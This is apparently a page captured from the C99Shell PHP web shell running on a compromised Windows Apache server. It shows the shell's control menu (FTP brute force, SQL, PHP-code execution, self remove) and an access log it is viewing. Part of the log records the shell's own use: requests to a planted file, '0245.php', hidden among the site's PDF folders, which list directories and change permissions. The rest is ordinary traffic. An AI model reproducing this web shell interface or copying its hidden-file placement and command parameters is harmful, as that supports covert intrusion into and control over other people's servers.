!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2024.03.20.log (6.43 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
186.102.67.252 - - [20/Mar/2024:00:00:41 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.67.252 - - [20/Mar/2024:00:00:41 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.67.252 - - [20/Mar/2024:00:00:51 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/tZPKsx1yYamW3xSREUzw/RmyB8NK3yqCH5TY2iRnBD0NaFF3iMMI7wx+HQMr0jSNoVsJ6s4kaHkNJHPwZXK6TVgnGruNxvZ4EdLvyonHKHIeVPCV2jZGBgjfr0JRlllaMQBGQF7ARvNERQmoOs0usM2I2DqOj8ueB5HRJzB6VlHcbSpUvqeSr80++CuniWUAQd7B3PShQB5neRhI9bFc4a8H9C23xvWQlIWSLusJDj3wgScR3l25mVRfT3Rw+VPUDHBPonPmr7g==&u=U2FsdGVkX18OTd+VxDsiYbBOGhzXsLZbk8GcHC6kibfanW8caoKHw6yL7FiRFr04&y=U2FsdGVkX18hUvcaMuytfsQYbCuEVmpFuDfE08afQD0/ApAUOrlIuOdG4tDJ96WG HTTP/1.1" 200 26
186.102.67.252 - - [20/Mar/2024:00:00:52 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX18OTd+VxDsiYbBOGhzXsLZbk8GcHC6kibfanW8caoKHw6yL7FiRFr04&y=U2FsdGVkX18hUvcaMuytfsQYbCuEVmpFuDfE08afQD0/ApAUOrlIuOdG4tDJ96WG HTTP/1.1" 200 26
186.102.67.252 - - [20/Mar/2024:00:00:52 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19Ck9e/FaOlDvuaeMxWpKrCpJQUxx5xMPI/8CTzT44O018/G4BdxAcR9vs0GBK/Owfl+jOagWNldIQRXttRX2VviCyQ8F3UBjnLlwXVC/1+HL5FJE71xmfl/5KvXLB7dzuWZOFngxKvqPKr94tlj2KW27pWzjVKW6w=&u=U2FsdGVkX18OTd+VxDsiYbBOGhzXsLZbk8GcHC6kibfanW8caoKHw6yL7FiRFr04&y=U2FsdGVkX18hUvcaMuytfsQYbCuEVmpFuDfE08afQD0/ApAUOrlIuOdG4tDJ96WG HTTP/1.1" 200 26
186.102.67.252 - - [20/Mar/2024:00:00:52 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18mH04m4bSKN9uYQtQ7dDSPzL+lxyHLHSzCRIPijutq7ARrLqMxe3dwzl1V12w/ocsOOpxkM8i7roKiAsfd+lKR/X2tTme2bfh2PymXj3luq3edlbwIXIbZF6J9xJASBKdYQXbc7n7gCVIhg7BvzWflOrWeNxQwt4w=&u=U2FsdGVkX18OTd+VxDsiYbBOGhzXsLZbk8GcHC6kibfanW8caoKHw6yL7FiRFr04&y=U2FsdGVkX18hUvcaMuytfsQYbCuEVmpFuDfE08afQD0/ApAUOrlIuOdG4tDJ96WG HTTP/1.1" 200 26
186.102.67.252 - - [20/Mar/2024:00:00:53 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18ID+YZFSUJJQOqlrIR1a2rUu5zpLs0R6OLhxeE8mbqcsxLIqif01MKWzZolZXg2L8FoK0uA7+6GU/y2R8rIglri1P/wSM2s+J4Si8QyRyqOfZ2Dwb1tsPfZwpsSd69gmEvIq2pgoYbfH+PKlEUhAf3xvrLVgoBIMk=&u=U2FsdGVkX18OTd+VxDsiYbBOGhzXsLZbk8GcHC6kibfanW8caoKHw6yL7FiRFr04&y=U2FsdGVkX18hUvcaMuytfsQYbCuEVmpFuDfE08afQD0/ApAUOrlIuOdG4tDJ96WG HTTP/1.1" 200 26
186.102.67.252 - - [20/Mar/2024:00:00:53 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19k8EpnDR9/ci2byX63TU4C9XmNBlT3gr2OpQkE25ERtpImXXKkpnP28pU7OKu64t4rrDhz92/OKvJ5T+4hbsDMPm6one4RL1gvnwHr+0pUCpIzA++XgAMza6Q1cHMUpC2c1/tqQPP8QreZhnr0GmFNaeOlfyDJ7kZjvwn5aJ+z1VJTnnFQo8MK5Lu0dWqwG4hdNyfp9d2Wkw==&u=U2FsdGVkX18OTd+VxDsiYbBOGhzXsLZbk8GcHC6kibfanW8caoKHw6yL7FiRFr04&y=U2FsdGVkX18hUvcaMuytfsQYbCuEVmpFuDfE08afQD0/ApAUOrlIuOdG4tDJ96WG HTTP/1.1" 200 26
186.102.67.252 - - [20/Mar/2024:00:00:53 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18DM0QpkWlKR8fYABotkPgIzttNHK5BvxgAedwzyTBwwnKtgTQGvUVztkT+yV3XiV4TADRaRFGbNMU8Bxhp/ckQUOMCjFVo3WiZ6gFwly1/iaXQSPxsDUTcpCXCQ632dQGM42msgqqXL8b2+e8HX6fqREmU0cCJzz5vZP0CC0bdV4HMDCIOLdrkVsme8R1jNUGAEhVLwgYjNVJq1/fiR8dNaiE4fVSekK2jgDCqQPWSUNMT5rjTSiBaqK1MHU6axEI6buFGFp3LN3hsupE8Yi5j/Y9+0vw4YhE1iHMvDnTXwODz+/5UsteDcreqNBBBaSkDIVSnREnIJ4hSH1uO64ZmKbPdBLLCm8V/BVH2ASKzFMpvo4ZLI/qejRfTjHC4L53KjUOx2fyPcjEdUgPanO9Iin08RQTxVlvcT/QT9FvX5iKBZLMUWdC6x8HgvFHONQ++vXj4Pb6bKtgRrFi3V5Vv41J2QDUwMwHAg3HtGZd87ZvcTTOID0VAU1FV/atSknrdu4QoCJt47g==&u=U2FsdGVkX18OTd+VxDsiYbBOGhzXsLZbk8GcHC6kibfanW8caoKHw6yL7FiRFr04&y=U2FsdGVkX18hUvcaMuytfsQYbCuEVmpFuDfE08afQD0/ApAUOrlIuOdG4tDJ96WG HTTP/1.1" 200 26
186.102.67.252 - - [20/Mar/2024:00:00:53 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+sDJ4JOJIyn7l1OkyHx4SI+eyKifHrGd3iCo5T/VgqPnIo7OnR5l/qMeKDiCtGWXdHv1Vv78i0VWnLWvaLO5VyYIEosQfCUMe6YDNWw1jpzlq6YXqb1Eryk3DkvkKAd8BKfm5vfP4DvQf9rCTRai9vyADqfjTbeEpYxrtegtcEmk1MNftpJLkGpHx1PDLY+M1L/s1Stza5Mfns6t2C8SyY2NedrGh2M/1ZwzTcIMWYWRZST65375wBj6jltmov/pCMQV78VHh57n7svn92GeGzF0FS+iCFiOb9muzxRxW/s/bnIshrkUI/rxNW8FD6PQI4swHVslDT0K83MwD6hmdmWeOEB6uOpHWei9pA6XNm00S5/h+DdTjed0veGMNdxRyDt1tDuWHZQdSVjyhyndUjbbGm8eZBJrzsVkqrKHIbsNRmTpyDVS+qhkzXu6JuM3Yjx8BBK1D/msrk0xY/jnludXAY76WpkPVb9n3yACN0crg1OYqRVBic&u=U2FsdGVkX18OTd+VxDsiYbBOGhzXsLZbk8GcHC6kibfanW8caoKHw6yL7FiRFr04&y=U2FsdGVkX18hUvcaMuytfsQYbCuEVmpFuDfE08afQD0/ApAUOrlIuOdG4tDJ96WG HTTP/1.1" 200 26
172.22.2.4 - - [19/Mar/2024:23:59:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.20 - - [20/Mar/2024:00:01:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1038.pdf HTTP/1.1" 200 588497
172.22.2.4 - - [20/Mar/2024:00:00:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55823
201.245.192.253 - - [20/Mar/2024:00:02:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
172.22.2.4 - - [20/Mar/2024:00:02:30 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
52.167.144.171 - - [20/Mar/2024:00:02:37 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110175
191.102.85.241 - - [20/Mar/2024:00:02:38 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 14105
191.102.85.241 - - [20/Mar/2024:00:02:41 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2023%2F HTTP/1.1" 200 512834
216.245.221.92 - - [20/Mar/2024:00:04:16 -0500] "HEAD / HTTP/1.1" 200 -
199.16.157.182 - - [20/Mar/2024:00:06:50 -0500] "GET /images/atencion-al-ciudadano-abril.jpg HTTP/1.1" 200 116523
172.22.2.4 - - [20/Mar/2024:00:05:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.31.211.17 - - [20/Mar/2024:00:07:37 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
186.31.211.17 - - [20/Mar/2024:00:07:37 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
186.31.211.17 - - [20/Mar/2024:00:07:37 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [20/Mar/2024:00:07:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
172.22.2.4 - - [20/Mar/2024:00:06:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53818
130.84.14.29 - - [20/Mar/2024:00:08:23 -0500] "GET /robots.txt HTTP/1.1" 404 1035
130.84.14.29 - - [20/Mar/2024:00:08:23 -0500] "GET /portaldeninos/wp-content/uploads/2020/06/yt.jpg HTTP/1.1" 200 10577
201.245.192.253 - - [20/Mar/2024:00:08:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
216.245.221.92 - - [20/Mar/2024:00:09:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2024:00:09:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
172.22.2.4 - - [20/Mar/2024:00:09:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Mar/2024:00:10:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49794
172.22.2.4 - - [20/Mar/2024:00:11:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Mar/2024:00:12:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
216.245.221.92 - - [20/Mar/2024:00:14:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2024:00:14:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
40.77.167.28 - - [20/Mar/2024:00:14:54 -0500] "GET /BLA/resoluciones/AUTOS%202020/1235.pdf HTTP/1.1" 200 938346
152.61.192.232 - - [20/Mar/2024:00:15:53 -0500] "GET / HTTP/1.1" 200 319
216.244.66.195 - - [20/Mar/2024:00:16:34 -0500] "GET /galeria/galeria/fotos/Humedal-vaca7G.jpg HTTP/1.1" 200 149081
205.210.31.242 - - [20/Mar/2024:00:18:12 -0500] "\x16\x03\x01" 400 226
205.210.31.242 - - [20/Mar/2024:00:18:12 -0500] "\x16\x03\x01" 400 226
172.22.2.4 - - [20/Mar/2024:00:17:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2024:00:19:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37194
201.245.192.253 - - [20/Mar/2024:00:19:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37920
216.245.221.92 - - [20/Mar/2024:00:19:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2024:00:19:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
172.22.2.4 - - [20/Mar/2024:00:17:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [20/Mar/2024:00:19:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37202
130.84.14.25 - - [20/Mar/2024:00:20:44 -0500] "GET /robots.txt HTTP/1.1" 404 1035
201.245.192.253 - - [20/Mar/2024:00:20:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37920
216.244.66.195 - - [20/Mar/2024:00:21:06 -0500] "GET /BLA/resoluciones/AUTOS%202007/1965.pdf HTTP/1.1" 200 46732
216.244.66.195 - - [20/Mar/2024:00:21:11 -0500] "GET /BLA/resoluciones/AUTOS%202010/0864.pdf HTTP/1.1" 200 174985
216.244.66.195 - - [20/Mar/2024:00:21:16 -0500] "GET /BLA/resoluciones/AUTOS%202010/4462.pdf HTTP/1.1" 200 209108
130.84.14.25 - - [20/Mar/2024:00:20:45 -0500] "GET /portaldeninos/wp-content/uploads/2022/08/HUmedalConejera03-1.jpg HTTP/1.1" 200 12388495
216.244.66.195 - - [20/Mar/2024:00:21:19 -0500] "GET /BLA/resoluciones/AUTOS%202010/5412.pdf HTTP/1.1" 200 151303
216.244.66.195 - - [20/Mar/2024:00:21:22 -0500] "GET /BLA/resoluciones/AUTOS%202010/5424.pdf HTTP/1.1" 200 420655
47.128.122.139 - - [20/Mar/2024:00:24:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs&f=apache_pb.gif HTTP/1.1" 200 2843
216.245.221.92 - - [20/Mar/2024:00:24:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2024:00:24:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
172.22.2.4 - - [20/Mar/2024:00:22:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Mar/2024:00:22:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Mar/2024:00:23:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45535
172.22.2.4 - - [20/Mar/2024:00:23:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48425
3.20.63.178 - - [20/Mar/2024:00:25:37 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.175 - - [20/Mar/2024:00:27:19 -0500] "GET /BLA/resoluciones/AUTOS%202013/0589.pdf HTTP/1.1" 304 -
152.61.128.50 - - [20/Mar/2024:00:27:47 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [20/Mar/2024:00:29:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37194
201.245.192.253 - - [20/Mar/2024:00:29:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37920
216.245.221.92 - - [20/Mar/2024:00:29:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2024:00:29:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
201.245.192.253 - - [20/Mar/2024:00:29:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37202
47.128.63.34 - - [20/Mar/2024:00:29:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs&f=index.html HTTP/1.1" 200 2847
47.128.113.196 - - [20/Mar/2024:00:30:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs&f=rdc.jpg HTTP/1.1" 200 13915
47.128.113.196 - - [20/Mar/2024:00:30:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.113.196 - - [20/Mar/2024:00:30:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.113.196 - - [20/Mar/2024:00:30:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.113.196 - - [20/Mar/2024:00:30:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.113.196 - - [20/Mar/2024:00:30:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.113.196 - - [20/Mar/2024:00:30:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.113.196 - - [20/Mar/2024:00:30:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.113.196 - - [20/Mar/2024:00:30:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.113.196 - - [20/Mar/2024:00:30:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.113.196 - - [20/Mar/2024:00:30:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
172.22.2.4 - - [20/Mar/2024:00:28:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.116.133 - - [20/Mar/2024:00:30:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3225.pdf HTTP/1.1" 200 2900
201.245.192.253 - - [20/Mar/2024:00:30:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37920
172.22.2.4 - - [20/Mar/2024:00:30:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
47.128.112.22 - - [20/Mar/2024:00:30:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5CPMA+RAMSAR&sort=0a HTTP/1.1" 200 3996
47.128.112.22 - - [20/Mar/2024:00:31:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.112.22 - - [20/Mar/2024:00:31:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_php HTTP/1.1" 200 79
47.128.112.22 - - [20/Mar/2024:00:31:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
172.22.2.4 - - [20/Mar/2024:00:29:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51133
47.128.112.239 - - [20/Mar/2024:00:31:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima&f=readme.html HTTP/1.1" 200 2873
47.128.35.1 - - [20/Mar/2024:00:31:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5C&sort=2a HTTP/1.1" 200 7471
47.128.35.1 - - [20/Mar/2024:00:31:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ico HTTP/1.1" 200 175
47.128.35.1 - - [20/Mar/2024:00:31:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.35.1 - - [20/Mar/2024:00:31:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.35.1 - - [20/Mar/2024:00:31:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_png HTTP/1.1" 200 175
47.128.35.1 - - [20/Mar/2024:00:31:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_php HTTP/1.1" 200 79
47.128.35.1 - - [20/Mar/2024:00:31:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_css HTTP/1.1" 200 134
47.128.35.1 - - [20/Mar/2024:00:31:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.35.1 - - [20/Mar/2024:00:31:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_svg HTTP/1.1" 200 1034
47.128.35.1 - - [20/Mar/2024:00:31:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_falke1 HTTP/1.1" 200 1034
47.128.35.1 - - [20/Mar/2024:00:31:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_zip HTTP/1.1" 200 577
47.128.35.1 - - [20/Mar/2024:00:31:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_doc HTTP/1.1" 200 140
47.128.35.1 - - [20/Mar/2024:00:31:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
66.249.66.37 - - [20/Mar/2024:00:32:13 -0500] "GET /dia-mundial-de-la-tierra-unete-a-esta-celebracion-con-actividades-que-promueven-el-cuidado-de-nuestro-planeta.html HTTP/1.1" 200 818
66.249.66.20 - - [20/Mar/2024:00:32:43 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/1459.pdf HTTP/1.1" 304 -
172.22.2.4 - - [20/Mar/2024:00:33:35 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [20/Mar/2024:00:33:36 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [20/Mar/2024:00:33:36 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [20/Mar/2024:00:33:36 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [20/Mar/2024:00:33:36 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [20/Mar/2024:00:33:36 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [20/Mar/2024:00:33:36 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [20/Mar/2024:00:33:36 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
